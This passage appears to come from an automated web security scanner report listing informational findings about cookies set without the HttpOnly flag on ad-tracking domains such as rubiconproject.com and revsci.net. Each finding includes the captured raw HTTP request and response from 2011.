Set-Cookie: ses15=5032^19&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111296; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3203911.js^3^1315097079^1315098303&3225379.js^1^1315097102^1315097102&3164883.js^1^1315097102^1315097102&3214998.js^4^1315097100^1315097102; expires=Sun, 11-Sep-2011 01:05:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1915

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3203911"
...[SNIP]...

14.64. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111512; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196491.js^2^1315097278^1315098087&3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 01:01:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2067

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196491"
...[SNIP]...

14.65. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315096931625343%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 00:53:15 GMT
Set-Cookie: BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 00:53:15 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315096931625343&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0
Content-Length: 0
X-Brilig-D: D=2992
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


14.66. http://pix04.revsci.net/A11149/a4/0/0/123.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26type%3Dgif%26seg_id%3D%7Btrimsegs%7D%26add%3Dtrue HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; rsi_segs_1000000=pUPFOMPC7nMQVv0bea5BqwmbRK+MVkRJAbeHbXhI9gQ4O3XY0n8gIQtYr8iWg2RZvh/nqedFjTikWJN1Ce1I20XZputsNYD8PRldhSQAgu3S781lzRP/7kn26cuKgM1KT5NUGEwNTM9smvMFtEf0ZLVTC0b7aBgzCg7Xur7v1rk70L8ih1N/YsuwCfoGn7sf5fgIfSAzMGQGLY+A6oofsCAXph2yry3ZEDY5O7XBeBJ7kKXTPQ==; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; 
rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFec/C7nMQFlLKHV2YkRHDFZ6XU5/wAHYhBTtuzLxhsncWnsac5BtpDFUZr6/jfDVRBOK9JSmsXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kh6uj0O8yCeuP9QjUfquN0IT95gRWIOeIZ5VDzmd1TGncaIJy5Rmt72Y6sBk6eWHFT7d521/0QDr5cvwqaaeOq2sGW8QJkTmvIGA+gr1Jf7nK; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 01:14:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://segments.adap.tv/data/?p=audiencescience&type=gif&seg_id=&add=true
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:01 GMT


14.67. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=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; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdI00GmV2emY3QHv3DVg9B02LswZhakqVFftDs8Pd8XH9p7LJOwoP+gn4nNPri7ZTBvzApv7OPHPbRT1bOas9RWPwMputF602mB2D/7kn26cvKk8znLSqrkUfWnvvP/lQ7FJEAIi/uZ65/PObD+9k+Oks/AIbF67IR+HUIyHvOjU5HxCf9/9FI4F5DDnZWHU17vK5Xoqw1LgsRAwEDgjYhNKRDbKw8H+dTTWvNOLItf3a3CQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:12 GMT

GIF89a.............!.......,...........D..;

14.68. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv/9FEJUSpn5l6pVFGFtoFPcNiZQXEmRfNYGCemmjfgrpYXr01sQ9tiT8EX00BRV94CRgAU+Cx+A1UyfYZNMCAyWVxgaMJPGkf8TFIlYXlki3Za8SZrHQcbAAHtzBKuHN1WnZO/FADdFtbQ4tTcDTv+/Xlt+BhYtDIVpaeByA0iypN5Q1/ovDhNl5rC75OYkwLvQ+PNALghcwtRNb5XQkE/e736rwI59LV+Lxcr6hqYtoSa0Y7NmcqmxdooVTFg8d9OkXAe/nA0Pv09oobrkR1sPhh4bpWCMXXgcnIXJhRZL+WmuuhUNICfUwoHrSnfNd7INRqbEKlrkyI4ranyBdGGDnfpMhZ4d70tSL78Wzix96AC37O8TjtMhOyNvZtMEqM3Vu430adx2g6NcgghcyBCd/4ZD11sEyYhtAVGsixJ9D/eNU5p5xq8uXL62d3u/+3GJw/j/OmHcrDVGO1Ets+Ml/G2x8IfPGrQ6BXlnVPkZ0Yb0DLjAe/Mlto3nTqXnqLZJtNb+TCCZgNCcA4D1t8TtjhkqPedaX74wLR/4PIrwHSr9l/ZtT0andQyxYusw/hmtZVIFFrzRGki+nKKU+DfZzsBVISF3gY636fNNZGUnxnT+qoUbza+WQ5nu4y+xgvM3rX0KCpaI9y4j+M2HLlBBe0Y66nyTZhgnberGlUfyGAREOYcmLefKqQ8vnPRH34tstpiLW8fVZymfgXFnOrHvEfIkajgy5PFOicYxMmRwPaxj3cxb/4LuZmv/rC5Pk0o5fWR77B8xzpw4B3wE0nnO1GT7gpH7oiyCu3p7BKVkMayCiP7wU3LSaSVJMh6rwvMlxBnhqJQ7I8o2/N/s/zBI3sOWJ1RjDG/QWxgo2bY9PHDrgr9EMCvN2YESZZxIO3sQnvBDpmvkmA9SYEb4uffYOulKcagBZoDKaBk3xg90muYx0Yn5GskyQmwvnxYGwPebHzI8jqsMy3/N5N7mdMOlZs+AzRNfDK8eQetzUS3jUEu7evMgTUnNpAw5xNxCd7mkwJCzD3R2FhhUMXPIJpvkl5LUakIjQnacYISFbBXQ5VKvjBs3ArBfhOvf1PaJ7iQIYF9u8LFr5BnIQIb+A6fps+n3volzB+ugnGU8HH1EP+e0NI1L2C42QJVScul2+QNW4lkxtS0gX5W1qspjaE+hy9HSkd9; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 384

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126'];
if(typeof(D
...[SNIP]...

14.69. http://pix04.revsci.net/F09828/a4/0/0/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

14.70. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/954068462.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/954068462.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_Dp_w="MLtXrlEusS9roBD3MlioxsCF6sySUVfem3F3zgv5P2X5MNBz5u04Ie9ppXXLTNPCB8Rrdx21qWPBSMqTbO6HYwOXUoBWKm6QOeSxGzfdhIMqVpPipkbUdAcWiVJ3Cs4I2Yz+rbqR1Q7yacm6q3MhEYBqZRDVrlm4AttvllcDwygEvV4iEIdzZhutP2QInp8og4OZ+W7c9zRxnI1sZ/yaqTmrtGc5HBE/XipCAr9aBtIFqw2goGxwgKUjJ3So+TW+W8qspjGdsu4/t7OLlio5pcMR2nwhP2uILD3LHj7kAvztOgnn3xZhVKkQvKI+Vg=="; rsi_us_1000000="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"; rsi_segs_1000000=pUPFeknF7gMYF1JYvJuXopO09a420jnOKLfHaVwoHNgwnmKsDTMJ3YH2aKvvUGIZ/ovnvZQpXcibMPPd7DErWPCzXoGmdIFqM4kSkqVY4gx2tb55vuBU6xY7+voByvYres1JgvnVBK1tOVdIEKTEh5zeeSJ3c6azfwNbivbJs+KlZnQ2c6UCUEdoIjrmao/eYXYcDa0NTi8RdBX3aGM8/aQQvvQ=; 
udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5